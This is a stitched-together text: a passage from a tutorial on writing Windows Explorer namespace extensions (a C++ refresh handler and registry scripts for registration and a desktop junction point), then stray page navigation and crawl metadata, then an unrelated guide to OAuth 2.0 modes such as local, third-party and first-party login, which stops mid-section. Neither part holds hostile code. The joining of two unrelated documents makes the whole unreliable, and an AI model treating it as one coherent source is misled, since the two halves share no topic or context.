Refresh() to repopulate the list control.
STDMETHODIMP CShellViewImpl::Exec ( const GUID* pguidCmdGroup, DWORD nCmdID, DWORD nCmdExecOpt, VARIANTARG* pvaIn, VARIANTARG* pvaOut ) { HRESULT hrRet = OLECMDERR_E_UNKNOWNGROUP; if ( NULL == pguidCmdGroup ) { if ( OLECMDID_REFRESH == nCmdID ) { Refresh(); hrRet = S_OK; } } return hrRet; }
There are two parts to the registration: the normal COM server stuff, and an entry that tells Explorer to use our extension. The default value of the GUID key (the GUID is the one for
CShellFolderImpl, since that's the coclass that the shell instantiates directly) is the text to use for the extension's item. The
InfoTip value holds text to show in the info tip when the mouse hovers over the extension's item. The
DefaultIcon key specifies the location of the icon to use for the item. The
Attributes value holds a combination of
SFGAO_* flags (defined in shlobj.h). At the very least, it must be 671088640 (0x28000000) which is
SFGAO_FOLDER|SFGAO_BROWSABLE. Our extension also includes
SFGAO_CANRENAME|SFGAO_CANDELETE for a grand total of 671088688 (0x28000030). Adding those flags lets the user rename or delete the namespace item using the Explorer context menu or the keyboard. (If you don't include
SFGAO_DELETE, the user must manually edit the registry to remove the extension.)
HKCR { NoRemove CLSID { ForceRemove {4145E10E-36DB-4F2C-9062-5DE1AF40BB31} = s 'Simple NSExt' { InprocServer32 = s '%MODULE%' { val ThreadingModel = s 'Apartment' } val InfoTip = s 'A simple sample namespace extension from CodeProject' DefaultIcon = s '%MODULE%,0' ShellFolder { val Attributes = d '671088688' } } } }
Here's the namespace extension item with its infotip:
The other part of the RGS file creates a junction point, which is how we tell Explorer to use our extension and where it should appear in the namespace. This is similar to shell extensions, which use a ShellEx key for the same purpose.
HKLM { NoRemove Software { NoRemove Microsoft { NoRemove Windows { NoRemove CurrentVersion { NoRemove Explorer { NoRemove Desktop { NoRemove NameSpace { ForceRemove {4145E10E-36DB-4F2C-9062-5DE1AF40BB31} { val 'Removal Message' = s 'Your custom "Don''t delete me!" text goes here.' } } } } } } } } }
You can change the Desktop key to change where the namespace extension appears; My Computer is a common one, which makes the extension appear at the same level as your drives and Control Panel. The GUID is again the GUID of
CShellFolderImpl. The
Removal Message string is displayed if the user has delete confirmation enabled and tries to delete the extension's item:
Yes, there is a ton of stuff to do when writing a namespace extension! And this article has only covered the basics. I already have ideas for future articles; part 2 will cover making an extension with subfolders, and handling events in Explorer's tree view.
General
News
Question
Answer
Joke
Rant
Admin
|
http://www.codeproject.com/KB/shell/namespcextguide1.aspx
|
crawl-002
|
refinedweb
| 6,837
| 54.42
|
The presentation below will try to guide you how to do it, using PHP, Java or ASP.
When available, we concentrate on open-source or free solutions as first choice.
If you want to contribute with another solution, please feel free to contact me.
HTML to PDF with PHP
This solution uses HTML2PDF project (sourceforge.net/projects/html2fpdf/). It simply gets a HTML text and generates a PDF file. This project is based upon FPDF script (), which is pure PHP, not using the PDFlib or other third party library. Download HTML2PDF, add it to your projects and you can start coding.Code example
require("html2fpdf.php"); $htmlFile = ""; $buffer = file_get_contents($htmlFile); $pdf = new HTML2FPDF('P', 'mm', 'Letter'); $pdf->AddPage(); $pdf->WriteHTML($buffer); $pdf->Output('test.pdf', 'F');
HTML to PDF with Java
You can use OpenOffice.org(must be available on the same computer or in your network) for document conversion.
Besides HTML to PDF, there are also possible other conversions:
doc --> pdf, html, txt, rtf
xls --> pdf, html, csv
ppt --> pdf, swf
import officetools.OfficeFile; // this is my tools package ... FileInputStream fis = new FileInputStream(new File("test.html")); FileOutputStream fos = new FileOutputStream(new File("test.pdf")); // suppose OpenOffice.org runs on localhost, port 8100 OfficeFile f = new OfficeFile(fis,"localhost","8100", true); f.convert(fos,"pdf"); ...
How to get my Java tools package for OpenOffice.org
If you want to use this solution in your projects, please contact
me:
HTML to PDF with ASP
You can use AspPDF (), an ActiveX server component for dynamically creating, reading and modifying PDF files.Code example(VB)
Set Pdf = Server.CreateObject("Persits.Pdf") Set Doc = Pdf.CreateDocument Doc.ImportFromUrl "" Filename = Doc.Save( Server.MapPath("test.pdf"), False )
|
http://www.dancrintea.ro/html-to-pdf/
|
CC-MAIN-2014-15
|
refinedweb
| 283
| 51.95
|
Flux, what and why?
If you are into front-end development, you’ve probably heard or read the term ‘Flux’. What does it mean and why should you care?
Let’s get one misconception out of the way, Flux is not a framework. It is a design pattern, an idea. It describes how to manage state and how data should flow through your application.
The core principle is that there is a ‘unidirectional data flow’. Data always flows in one way, this makes rich web applications more manageble.
Flux was presented by Facebook in combination with React. However, it is not required that you use React, you can use anything as View layer. Also there are lots of varieties and implementations out there. In this article we will focus on the ‘original way’ Facebook presented it, the examples will be in EcmaScript 6, they are slightly simplified but still valid.
The reason why React works so well with Flux is because it also follows the unidirectional data flow principle. Frameworks like AngularJS use concepts like two way databinding which violate this principle.
Actions
The pattern starts with Actions. Actions are essentially ‘events’ that happen in you application. They have a type and optionally some data. Actions can come from Views, other Actions or the Server. Actions are fired by calling an Action builder which is just a function. That function sends a new Action to the Dispatcher.
import Dispatcher from './dispatcher'; import { ADD_MESSAGE } from './constants'; export function addMessage(message) { const action = { type: ADD_MESSAGE, message: message } Dispatcher.handleAction(action); }
First we import a reference to the Dispatcher and the constants that contain our action types. When a user calls the
addMessage() Action builder function it will send a new Action object to the Dispatcher with its
handleAction() method. From that moment the job of the Action builder is done, fire and forget.
Dispatcher
The Dispatcher is the central ‘hub’ so to speak of a Flux application. The Dispatcher receives Actions and dispatches them to all the Stores. This is the only part that Facebook’s implementation provides you the code for. I’m not going to give a complete code example but I will show you the general interface:
class Dispatcher { register(callback) { //The Stores use this method to receive actions //the callback gets called when an action happens //with that action as parameter } handleAction(action) { //The Action builders call this method to get their //action dispatched to the stores } }
Most implementations of Flux remove the Dispatcher. In practice it’s just a kind of event system and there are simpler ways to distribute Actions.
Stores
Stores hold the state of the application. They receive Actions from the Dispatcher. The most important rule is that nobody but the Store itself may ever change its state! When the Store receives an Action from the Dispatcher, it can decide on what to do depending on the Action’s type and data. Finally, the Store notifies the View when its state has changed.
import { List } from 'immutable'; import EventEmitter from 'event-emitter'; import { ADD_MESSAGE, CHANGE_EVENT } from './constants'; import Dispatcher from './dispatcher'; let messages = List(); class MessageStore extends EventEmitter { constructor() { this.registerAtDispatcher(); } getMessages() { return messages; } emitChange() { this.emit(CHANGE_EVENT); } addChangeListener(callback) { this.on(CHANGE_EVENT, callback); } registerAtDispatcher() { Dispatcher.register((action) => { const {type, message, data} = action; switch(type) { case: ADD_MESSAGE: { const message = { message: message, date: new Date() }; messages = messages.push(message); this.emitChange(); break; } default: { break; } } }); } } export new MessageStore();
Firstly, the state is declared in a variable outside of the Store to hide it from outsiders. Then we register the Store at the Dispatcher with a callback. Everytime the Dispatcher receives an Action this callback is called. If it is called with an Action of type ‘ADD_MESSAGE’ we add a message to the messages list and notify the Views.
The only way for outsiders to read the messages list is by calling
getMessages() on the Store. They can get notified for changes by registering a callback with the
addChangeListener() method. This implementation uses the event-emitter library to add this event functionality.
In this example I use ImmutableJS to make the messages list Immutable. When I push a message to the list, it doesn’t mutate the original list, rather it returns a new list with the new message added. You are not required to use ImmutableJS, but I recommend never mutating data in your application so your data flow is simple and predictable.
Views
The View can be anything. It can be a React component if you use React. But it can also be an Angular component or whatever. A View registers itself at a Store (or multiple). When the Store updates itself it will notify the View and the View will update itself with the new state. The View can also trigger Actions, for example when the user clicks a button.
import React, { Component } from 'react'; import { addMessage } from './message-actions'; import MessageStore from './message-store'; export class MessageView extends Component { constructor() { this._onMessagesUpdated(); } componentDidMount() { MessageStore.addChangeListener(() => this._onMessagesUpdated); } _onMessagesUpdated() { this.setState({ messages: MessageStore.getMessages() }); } _handleAddMessage(e) { e.preventDefault(); const message = React.findDOMNode(this.refs.messageInput).value; addMessage(message); } render() { const messages = this.state.messages.map((msg) => <li>{msg.message}</li>) return ( <div> <ul>{messages}</ul> <input type="text" ref="messageInput"/> <button onClick="this._handleAddMessage">Add</button> </div> ) } }
This is an example of how a View could look in React. I won’t get into the React specific details. When the component mounts it registers itself at the Store with the
_onMessagesUpdated() callback. When the Store changes, it will call this callback and the View will retrieve the latest messages. So far the receiving part.
A View however can also put new data into the application. But it cannot go straight back to the Store, this would violate the unidirectional data flow. It can do so by triggering Actions. This View does this in the
_handleAddMessage() method. When the user inputs a message and clicks the ‘Add’ button, this handler will be fired and trigger an ‘ADD_MESSAGE’ action, then the cycle begins all over again!
Conclusion
This article became larger then I aimed for, this is mostly because Flux introduces a bunch of concepts that might seem a bit overkill. Some of them might actually turn out to be superfluous, as many implementations prove. Nonetheless Flux is a very simple concept once you wrap your head around it. It makes your application scaleable and its behaviour predictable. It is encouraged for ‘larger’ applications but I would even recommend it for ‘smaller’ ones. Using a framework like Alt or Redux gets rid of most of the boilerplate. Just try it out and let me know what you think!
Reference
- The ‘official’ Flux website: facebook.github.io/flux
- Nice video on using the Alt Flux framework: youtu.be/0wNWjtp-Ldg
- A collection of frameworks/implementations of Flux: github.com/voronianski/flux-comparison
|
https://wecodetheweb.com/2015/08/22/flux-what-and-why/
|
CC-MAIN-2019-18
|
refinedweb
| 1,145
| 59.19
|
clock_nanosleep - high resolution sleep with specifiable clock (ADVANCED REALTIME)
[CS]
#include <time.h>#include <time.h>
int clock_nanosleep(clockid_t clock_id, int flags,
const struct timespec *rqtp, struct timespec *rmtp);
If the flag TIMER_ABSTIME is not set in the flags argument, the clock_nanosleep() function shall cause shall be the clock specified by clock_id.
If the flag TIMER_ABSTIME is set in the flags argument, the clock_nanosleep() function shall cause() shall return immediately and the calling process shall not be suspended.
The suspension time caused by this function may) shall not be less than the time interval specified by rqtp, as measured by the corresponding clock. The suspension for the absolute clock_nanosleep() function (that is, with the TIMER_ABSTIME flag set) shall be in effect at least until the value of the corresponding clock reaches the absolute argument does not specify a known clock, or specifies the CPU-time clock of the calling thread.
- [ENOTSUP]
- The clock_id argument specifies a clock for which clock_nanosleep() is not supported, such as a CPU-time clock.
None.
Calling clock_nanosleep() with the value TIMER_ABSTIME not set in the flags argument and with a clock_id of CLOCK_REALTIME is equivalent to calling nanosleep() with the same rqtp and rmtp arguments.
The nanosleep() function specifies that the system-wide clock CLOCK_REALTIME is used to measure the elapsed time for this time service. However, with the introduction of the monotonic clock CLOCK_MONOTONIC(), the Base Definitions volume of IEEE Std 1003.1-2001, <time.h>
First released in Issue 6. Derived from IEEE Std 1003.1j-2000.
|
http://pubs.opengroup.org/onlinepubs/009604499/functions/clock_nanosleep.html
|
crawl-003
|
refinedweb
| 254
| 57.61
|
On 2020-04-10 11:16 p.m., Greg Ewing wrote:
On 11/04/20 6:34 am, Soni L. wrote:
def _extract(self, obj): try: yield (self.key, obj[self.key]) except (TypeError, IndexError, KeyError): if not self.skippable: raise exceptions.ValidationError
You can separate out the TypeError like this:
try: get = obj.__getitem__ except TypeError: ... try: yield (self.key, get(self.key)) except (IndexError, KeyError): ...
I also don't have a good way of changing this to wrap stuff in RuntimeError
Your proposed solution also requires everyone to update their __getitem__ methods before it will work. What's more, in the transition period (which you can expect to be *very* long) when not everyone has done so, your code would fail much of the time, because you would only be catching exceptions that were raised "in" the appropriate object, and would miss anything raised by old methods that did not use "in".
So your solution kind of has a chicken-and-egg problem. It wouldn't work unless everyone started using it everywhere at the same time, which is never going to happen.
They used to say that about Rust.
|
https://mail.python.org/archives/list/python-ideas@python.org/message/N2KBQXFSTURR4IU6UATEZHDAZL2T7G6Y/
|
CC-MAIN-2022-33
|
refinedweb
| 192
| 67.65
|
#include <wx/valtext.h>
wxTextValidator validates text controls, providing a variety of filtering behaviours.
For more information, please see wxValidator Overview.
Default constructor.
Clones the text validator using the copy constructor.
Reimplemented from wxValidator.
Returns true if at least one character of the given val string is present in the exclude list (set by SetExcludes() or SetCharExcludes()).
Returns true if all the characters of the given val string are present in the include list (set by SetIncludes() or SetCharIncludes()).
Returns a reference to the exclude list (the list of invalid values).
Returns a reference to the include list (the list of valid values).
Returns true if the given style bit is set in the current style.
Returns the error message if the contents of val are invalid or the empty string if val is valid.
Receives character input from the window and filters it according to the current validator style.
Breaks the given chars strings in single characters and sets the internal wxArrayString used to store the "excluded" characters (see SetExcludes()).
This function is mostly useful when
wxFILTER_EXCLUDE_CHAR_LIST was used.
Breaks the given chars strings in single characters and sets the internal wxArrayString used to store the "included" characters (see SetIncludes()).
This function is mostly useful when
wxFILTER_INCLUDE_CHAR_LIST was used.
Sets the exclude list (invalid values for the user input).
Sets the include list (valid values for the user input).
Sets the validator style which must be a combination of one or more of the wxTextValidatorStyle values.
Note that not all possible combinations make sense! Also note that the order in which the checks are performed is important, in case you specify more than a single style. wxTextValidator will perform the checks in the same definition order used in the wxTextValidatorStyle enumeration.
Transfers the value in the text control to the string.
Reimplemented from wxValidator.
Transfers the string value to the text control.
Reimplemented from wxValidator.
Validates the window contents against the include or exclude lists, depending on the validator style.
Reimplemented from wxValidator.
Reimplemented in wxNumericPropertyValidator.
|
https://docs.wxwidgets.org/3.0/classwx_text_validator.html
|
CC-MAIN-2018-51
|
refinedweb
| 337
| 59.3
|
Blurhash
BlurHash is a compact representation of a placeholder for an image. Instead of displaying boring grey little boxes while your image loads, show a blurred preview until the full image has been loaded.
The algorithm was created by woltapp/blurhash, which also includes an algorithm explanation.
Example Workflow
Usage
The decoders are written in Swift and Kotlin and are copied from the official woltapp/blurhash repository (MIT license). I use light in-memory-caching techniques to only re-render the (quite expensive) Blurhash image creation when one of the blurhash specific props (
blurhash,
decodeWidth,
decodeHeight or
decodePunch) has changed.
Read the algorithm description for more details
Example Usage:
import { Blurhash } from 'react-native-blurhash'; export default function App() { return ( <Blurhash blurhash="LGFFaXYk^6#[email protected],[email protected][or[Q6." style={{flex: 1}} /> ); }
See the example App for a full code example.
To run the example App, execute the following commands:
cd react-native-blurhash/example/ yarn cd ios; pod install; cd .. npm run ios npm run android
Encoding
This library also includes a native Image encoder, so you can encode Images to blurhashes straight out of your React Native App!
const blurhash = await Blurhash.encode('', 4, 3);
Because encoding an Image is a pretty heavy task, this function is non-blocking and runs on a separate background Thread.
Performance
The performance of the decoders is really fast, which means you should be able to use them in collections quite easily. By increasing the
decodeWidth and
decodeHeight props, the performance decreases. I'd recommend values of
16 for large lists, and
32 otherwise. Play around with the values but keep in mind that you probably won't see a difference when increasing it to anything above
32.
Benchmarks
All times are measured in milliseconds and represent exactly the minimum time it took to decode the image and render it. (Best out of 10). These tests were made with
decodeAsync={false}, so keep in mind that the async decoder might add some time at first run because of the Thread start overhead. iOS tests were run on an iPhone 11 Simulator, while Android tests were run on a Pixel 3a, both on the same MacBook Pro 15" i9.
Values larger than 32 x 32 are only used for Benchmarking purposes, don't use them in your app! 32x32 or 16x16 is plenty!
As you can see, at higher values the Android decoder is a lot faster than the iOS decoder, but suffers at lower values. I'm not quite sure why, I'll gladly accept any pull requests which optimize the decoders.
Asynchronous Decoding
Use
decodeAsync={true} to decode the Blurhash on a separate background Thread instead of the main UI-Thread. This is useful when you are experiencing stutters because of the Blurhash's decoder - e.g.: in large Lists.
Threads are re-used (iOS:
DispatchQueue, Android: kotlinx Coroutines).
Caching
Previously rendered Blurhashes will get cached, so they don't re-decode on every state change, as long as the
blurhash,
decodeWidth,
decodeHeight and
decodePunch properties stay the same.
|
https://reactnativeexample.com/a-compact-representation-of-a-placeholder-for-an-image-with-react-native/
|
CC-MAIN-2022-05
|
refinedweb
| 509
| 62.68
|
One of the banes of software development is writing the documentation. Most development teams would prefer to rally around the cry: "Let the technical writers of the world unite (and write our manuals)!" However, Python is designed to be self-documenting, and one should use that aspect of the language. The code you debug tomorrow may be your own. Or, in a karmic sense, the code you document today may grace your screen with well-documented code in the future.
While not a perfect substitute for full-fledged technical documentation, Python's self-documentation system is far more convenient. Consider the following function:
def fibo_gen():
x, y = 0, 1
while True:
yield x
x, y = y, x + y
This is a basic function Fibonacci for generating Fibonacci numbers. You can tell this from its use of the yield statement. Such functions merely return an iterator which returns the next in a sequence whenever it is called but does not contain a set, static set [More on iterators can be found in Max Hetland's Beginning Python ]. If you call the function with a range of 15 (as below), you will get the following output:
set = fibo_gen()
for x in range(15):
print set.next()
0
1
1
2
3
5
8
13
21
34
55
89
144
233
377
But what if you did not know what it did? What if the programmer who reads the code in 6 months does not know what it does? You can include documentation in the function itself for anyone who imports this function.
Do this by adding a docstring to the function. A docstring is a bit of documentation which immediately follows the function declaration line and precedes all of the function code. It is always offset with a set of three quotes, but whether you use single quotation marks or double quotation marks is your decision. Python recognises both. Consider the same function with the docstring:
def fibo_gen():Now, anyone who imports this function can access your brief documentation with Python's built-in help() function:
'''Generate Fibonacci numbers; return an iterator'''
x, y = 0, 1
while True:
yield x
x, y = y, x + y
>>> help(fibo_gen)
Help on function fibo_gen in module __main__:
fibo_gen()
Generate Fibonacci numbers; return an iterator.
|
http://python.about.com/od/gettingstarted/a/begdocstrings.htm
|
crawl-002
|
refinedweb
| 379
| 59.23
|
- Types
- Control Structures
- Object Members
- Events and Delegates
- Object Semantics
- Summary
Object Semantics
One of the primary concepts of C# is that, in many places, it forces a programmer to explicitly specify his intent. This eliminates a class of errors associated with assumption of default behavior in languages such as Java. For example, for polymorphism to occur in C#, a normal base class must declare a method as virtual, and the derived class must declare the overriding method with the overrides keyword. Without this explicit declaration, all calls to a base class reference execute a base class method, even if the actual object type is a derived class. Here's a C# method declaration:
class Bar { public Bar() { MyMethod(); } public void MyMethod() { Console.WriteLine("Bar.MyMethod()"); } } class Foo : Bar { static void Main(string[] args) { Bar myFoo = new Foo(); } public void MyMethod() { Console.WriteLine("Foo.MyMethod()"); } }
This produces "Bar.MyMethod()". This shows how C# produces a well-versioned implementation. Now here's the Java implementation:
class Bar { public Bar() { MyMethod(); } public void MyMethod() { System.out.println("Bar.MyMethod()"); } } public class Foo extends Bar { public static void main(String[] args) { Bar myFoo = new Foo(); } public void MyMethod() { System.out.println("Foo.MyMethod()"); } }
This produces "Foo.MyMethod()". It also reveals potentially serious versioning problems. Say that class Bar belongs to a third-party library, which doesn't implement MyMethod() in version 1.0, and the only MyMethod() called is to an instance of class Foo. The problem occurs when the third-party library updates class Bar to version 2.0 and adds MyMethod(). Because of implicit polymorphism, any call in class Bar to MyMethod() will accidentally invoke Foo.MyMethod().
|
http://www.informit.com/articles/article.aspx?p=23212&seqNum=6
|
CC-MAIN-2018-13
|
refinedweb
| 276
| 56.66
|
On Thursday, May 03, 2012 09:29:15 AM Daniel P. Berrange wrote: > On Wed, May 02, 2012 at 03:32:56PM -0400, Paul Moore wrote: > > static void vnc_set_share_mode(VncState *vs, VncShareMode mode) > > { > > #ifdef _VNC_DEBUG > > > > @@ -2748,6 +2772,14 @@ void vnc_display_init(DisplayState *ds) > > > > dcl->idle = 1; > > vnc_display = vs; > > > > + vs->fips = fips_enabled(); > > + VNC_DEBUG("FIPS mode %s\n", (vs->fips ? "enabled" : "disabled")); > > +#ifndef _WIN32 > > + if (vs->fips) { > > + syslog(LOG_NOTICE, "Disabling VNC password auth due to FIPS > > mode\n"); + } > > +#endif /* _WIN32 */ > > I really think this should only be done if a password is actually set. > With the code as it is, then every single time you launch a VM you're > going to get this message in syslog, which makes it appear as if something > is trying to illegally use passwords in FIPS mode. I feel this will cause > admins/auditors to be worried about something being wrong, when in fact > everything is normal. Yep. I can see arguments for either location but I'll go ahead and move it in v3 which I will be posting shortly. -- paul moore security and virtualization @ redhat
|
https://lists.gnu.org/archive/html/qemu-devel/2012-05/msg00466.html
|
CC-MAIN-2019-43
|
refinedweb
| 181
| 56.49
|
Important: Please read the Qt Code of Conduct -
Is possible to call from C++ a javascript function inside .js file?
Hi all
The way to call from C++ a javascript function inside a QML item is well know using invokeMethodwith a object pointer. However QML allow to store functions inside a separate .js file and call from item by declaring as:
import "MyFile.js" as MyFile
As in the topic, is possible to call function inside .js file from C++. I think no since .js file is not an item and doesn't have a direct pointer but just in case I ask if exist some workaround.
Thank you
- benlau Qt Champions 2016 last edited by
Well, there has a workaround / dirty hack for this problem.
Let's say you have a MyFile.js with following content:
.pragma library function hello() { console.log("Hello"); }
You may call the hello() function from c++ by
QQmlEngine engine; QJSValue value = engine.evaluate(QtShell::cat("MyFile.js") + ";hello"); // QtShell is not a part of Qt library. It provides a cat() which is same as Unix's cat command value.call(); // Print "Hello"
Hi
Thank you for the suggestion but this solution require to create a object "pointer" to each single functions inside .js file, that is really unpratical solution. It seem you confirm there is no way to access .js functions like single item. I'll reorganize the code in other way...
|
https://forum.qt.io/topic/79614/is-possible-to-call-from-c-a-javascript-function-inside-js-file
|
CC-MAIN-2021-31
|
refinedweb
| 238
| 68.57
|
I know what you are thinking, is this really another guide to OAuth 2.0?
Well, yes and no.. This document is based on hundreds of conversations and client implementations as well as our experience building FusionAuth, an OAuth server which has been downloaded over a million times.
If that sounds good to you, keep reading!
We do cover a lot, so here’s a handy table of contents to let you jump directly to a section if you’d like.
- OAuth overview
- OAuth modes
- OAuth Grants
- Authorization Code grant
- Login/register buttons
- Authorize endpoint parameters
- Logging in
- Redirect and retrieve the tokens
- Tokens
- User and token information
- Local login and registration with the Authorization Code grant
- Third-party login and registration (also Enterprise login and registration) with the Authorization Code grant
- Third-party authorization with the Authorization Code grant
- First-party login and registration and first-party service authorization
- Implicit grant in OAuth 2.0
- Resource Owner’s Password Credentials grant
- Client Credentials grant
- Device grant
- Conclusion
OAuth overview
OAuth 2.0 is a set of specifications that allow developers to easily delegate the authentication and authorization of their users to someone else. While the specifications don’t specifically cover authentication, in practice this is a core piece of OAuth, so we will cover it in depth (because that’s how we roll).
What does that mean, really? It means that your application sends the user over to an OAuth server, the user logs in, and then the user is sent back to your application. However, there are a couple of different twists and goals of this process. Let’s cover those next.
OAuth modes
None of the specifications cover how OAuth is actually integrated into applications. Whoops! But as a developer, that’s what you care about. They also don’t cover the different workflows or processes that leverage OAuth. They leave almost everything up to the implementer (the person who writes the OAuth Server) and integrator (the person who integrates their application with that OAuth server).
Rather than just reword the information in the specifications (yet again), let’s create a vocabulary for real-world integrations and implementations of OAuth. We’ll call them OAuth modes.
There are eight OAuth modes in common use today. These real world OAuth modes are:
- Local login and registration
- Third-party login and registration (federated identity)
- First-party login and registration (reverse federated identity)
- Enterprise login and registration (federated identity with a twist)
- Third-party service authorization
- First-party service authorization
- Machine-to-machine authentication and authorization
- Device login and registration
I’ve included notation on a few of the items above specifying which are federated identity workflows. The reason that I’ve changed the names here from just “federated identity” is that each case is slightly different. Plus, the term federated identity is often overloaded and misunderstood. To help clarify terms, I’m using “login” instead. However, this is generally the same as “federated identity” in that the user’s identity is stored in an OAuth server and the authentication/authorization is delegated to that server.
Let’s discuss each mode in a bit more detail, but first, a cheat sheet.
Which OAuth mode is right for you?
Wow, that’s a lot of different ways you can use OAuth. That’s the power and the danger of OAuth, to be honest with you. It is so flexible that people new to it can be overwhelmed. So, here’s a handy set of questions for you to ask yourself.
- Are you looking to outsource your authentication and authorization to a safe, secure and standards-friendly auth system? You’ll want Local login and registration in that case.
- Trying to avoid storing any credentials because you don’t want responsibility for passwords? Third-party login and registration is where it’s at.
- Are you selling to Enterprise customers? Folks who hear terms like SAML and SOC2 and are comforted, rather than disturbed? Scoot on over to Enterprise login and registration.
- Are you building service to service communication with no user involved? If so, you are looking for Machine-to-machine authorization.
- Are you trying to let a user log in from a separate device? That is, from a TV or similar device without a friendly typing interface? If this is so, check out Device login and registration.
- Are you building a platform and want to allow other developers to ask for permissions to make calls to APIs or services on your platform? Put on your hoodie and review First-party login and registration and First-party service authorization.
- Do you have a user store already integrated and only need to access a third party service on your users’ behalf? Read up on Third-party service authorization.
With that overview done, let’s examine each of these modes in more detail.
Local login and registration
The Local login and registration mode is when you are using an OAuth workflow to register or log users into your application. In this mode, you own both the OAuth server and the application. You might not have written the OAuth server (if you are using a product such as FusionAuth), but you control it. In fact, this mode usually feels like the user is signing up or logging directly into your application via native forms and there is no delegation at all.
What do we mean by native forms? Most developers have at one time written their own login and registration forms directly into an application. They create a table called
users and it stores
usernames and
passwords. Then they write the registration and the login forms (HTML or some other UI). The registration form collects the
username and
password and checks if the user exists in the database. If they don’t, the application inserts the new user into the database. The login form collects the
username and
password and checks if the account exists in the database and logs the user in if it does. This type of implementation is what we call native forms.
The only difference between native forms and the Local login and registration OAuth mode is that with the latter you delegate the login and registration process to an OAuth server rather than writing everything by hand. Additionally, since you control the OAuth server and your application, it would be odd to ask the user to “authorize” your application. Therefore, this mode does not include the permission grant screens that often are mentioned in OAuth tutorials. Never fear; we’ll cover these in the next few sections.
So, how does this work in practice? Let’s take a look at the steps for a fictitious web application called “The World’s Greatest ToDo List” or “TWGTL” (pronounced Twig-Til):
- A user visits TWGTL and wants to sign up and manage their ToDos.
- They click the “Sign Up” button on the homepage.
- This button takes them over to the OAuth server. In fact, it takes them directly to the registration form that is included as part of the OAuth workflow (specifically the Authorization Code grant which is covered later in this guide).
- They fill out the registration form and click “Submit”.
- The OAuth server ensures this is a new user and creates their account.
- The OAuth server redirects the browser back to TWGTL, which logs the user in.
- The user uses TWGTL and adds their current ToDos. Yay!
- The user stops using TWGTL; they head off and do some ToDos.
- Later, the user comes back to TWGTL and needs to sign in to check off some ToDos. They click the
My Accountlink at the top of the page.
- This takes the user to the OAuth server’s login page.
- The user types in their username and password.
- The OAuth server confirms their identity.
- The OAuth server redirects the browser back to TWGTL, which logs the user in.
- The user interacts with the TWGTL application, merrily checking off ToDos.
That’s it. The user feels like they are registering and logging into TWGTL directly, but in fact, TWGTL is delegating this functionality to the OAuth server. The user is none-the-wiser so this is why we call this mode Local login and registration.
An aside about this mode and mobile applications
The details of this mode has implications for the security best practices recommended by some of the standards bodies. In particular, the OAuth 2.0 for Native Apps Best Current Practices (BCP) recommends against using a webview:
This best current practice requires that native apps MUST NOT use embedded user-agents to perform authorization requests…
This is because the “embedded user-agents”, also known as webviews, are under control of the mobile application developer in a way that the system browser is not.
If you are operating in a mode where the OAuth server is under a different party’s control, such as the third-party login that we’ll cover next, this prohibition makes sense. But in this mode, you control everything. In that case, the chances of a malicious webview being able to do extra damage is minimal, and must be weighed against the user interface issues associated with popping out to a system browser for authentication.
Third-party login and registration
The Third-party login and registration mode is typically implemented with the classic “Login with …” buttons you see in many applications. These buttons let users sign up or log in to your application by logging into one of their other accounts (i.e. Facebook or Google). Here, your application sends the user over to Facebook or Google to log in.
Let’s use Facebook as an example OAuth provider. In most cases, your application will need to use one or more APIs from the OAuth provider in order to retrieve information about the user or do things on behalf of the user (for example sending a message on behalf of the user). In order to use those APIs, the user has to grant your application permissions. To accomplish this, the third-party service usually shows the user a screen that asks for certain permissions. We’ll refer to these screens as the “permission grant screen” throughout the rest of the guide.
For example, Facebook will present a screen asking the user to share their email address with your application. Once the user grants these permissions, your application can call the Facebook APIs using an access token (which we will cover later in this guide).
Here’s an example of the Facebook permission grant screen, where Zapier would like to access a user’s email address:
After the user has logged into the third-party OAuth server and granted your application permissions, they are redirected back to your application and logged into it.
This mode is different from the previous mode because the user logged in but also granted your application permissions to the service (Facebook). This is one reason so many applications leverage “Login with Facebook” or other social integrations. It not only logs the user in, but also gives them access to call the Facebook APIs on the user’s behalf.
Social logins are the most common examples of this mode, but there are plenty of other third-party OAuth servers beyond social networks (GitHub or Discord for example).
This mode is a good example of federated identity. Here, the user’s identity (username and password) is stored in the third-party system. They are using that system to register or log in to your application.
So, how does this work in practice? Let’s take a look at the steps for our TWGTL application if we want to use Facebook to register and log users in:
- A user visits TWGTL and wants to sign up and manage their ToDos.
- They click the “Sign Up” button on the homepage.
- On the login and registration screen, the user clicks the “Login with Facebook” button.
- This button takes them over to Facebook’s OAuth server.
- They log in to Facebook (if they aren’t already logged in).
- Facebook presents the user with the permission grant screen based on the permissions TWGTL needs. This is done using OAuth scopes, which we will cover later in this guide.
- Facebook redirects the browser back to TWGTL, which logs the user in. TWGTL also calls Facebook APIs to retrieve the user’s information.
- The user begins using TWGTL and adds their current ToDos.
- The user stops using TWGTL; they head off and do some ToDos.
- Later, the user comes back to TWGTL and needs to log in to check off some of their ToDos. They click the
My Accountlink at the top of the page.
- This takes the user to the TWGTL login screen that contains the “Login with Facebook” button.
- Clicking this takes the user back to Facebook and they repeat the same process as above.
You might be wondering if the Third-party login and registration mode can work with the Local login and registration mode. Absolutely! This is what I like to call Nested federated identity (it’s like a hot pocket in a hot pocket). Basically, your application delegates its registration and login forms to an OAuth server like FusionAuth. Your application also allows users to sign in with Facebook by enabling that feature of the OAuth server (FusionAuth calls this the Facebook Identity Provider). It’s a little more complex, but the flow looks something like this:
- A user visits TWGTL and wants to sign up and manage their ToDos.
- They click the “Sign Up” button on the homepage.
- This button takes them over to the OAuth server’s login page.
- On this page, there is a button to “Login with Facebook” and the user clicks that.
- This button takes them over to Facebook’s OAuth server.
- They log in to Facebook.
- Facebook presents the user with the permission grant screen.
- The user authorizes the requested permissions.
- Facebook redirects the browser back to TWGTL’s OAuth server, which reconciles out the user’s account.
- TWGTL’s OAuth server redirects the user back to the TWGTL application.
- The user is logged into TWGTL.
What does “reconcile out” mean? OAuth has its jargon, oh yes. To reconcile a user with a remote system means optionally creating a local account and then attaching data and identity from a remote data source like Facebook to that account. The remote account is the authority and the local account is modified as needed to reflect remote data.
The nice part about this workflow is that TWGTL doesn’t have to worry about integrating with Facebook (or any other provider) or reconciling the user’s account. That’s handled by the OAuth server. It’s also possible to delegate to additional OAuth servers, easily adding “Login with Google” or “Login with Apple”. You can also nest deeper than the 2 levels illustrated here.
First-party login and registration
The First-party login and registration mode is the inverse of the Third-party login and registration mode. Basically, if you happen to be Facebook (hi Zuck!) in the examples above and your customer is TWGTL, you are providing the OAuth server to TWGTL. You are also providing a way for them to call your APIs on behalf of your users.
This type of setup is not just reserved for the massive social networks run by Silicon Valley moguls; more and more companies are offering this to their customers and partners, therefore becoming platforms.
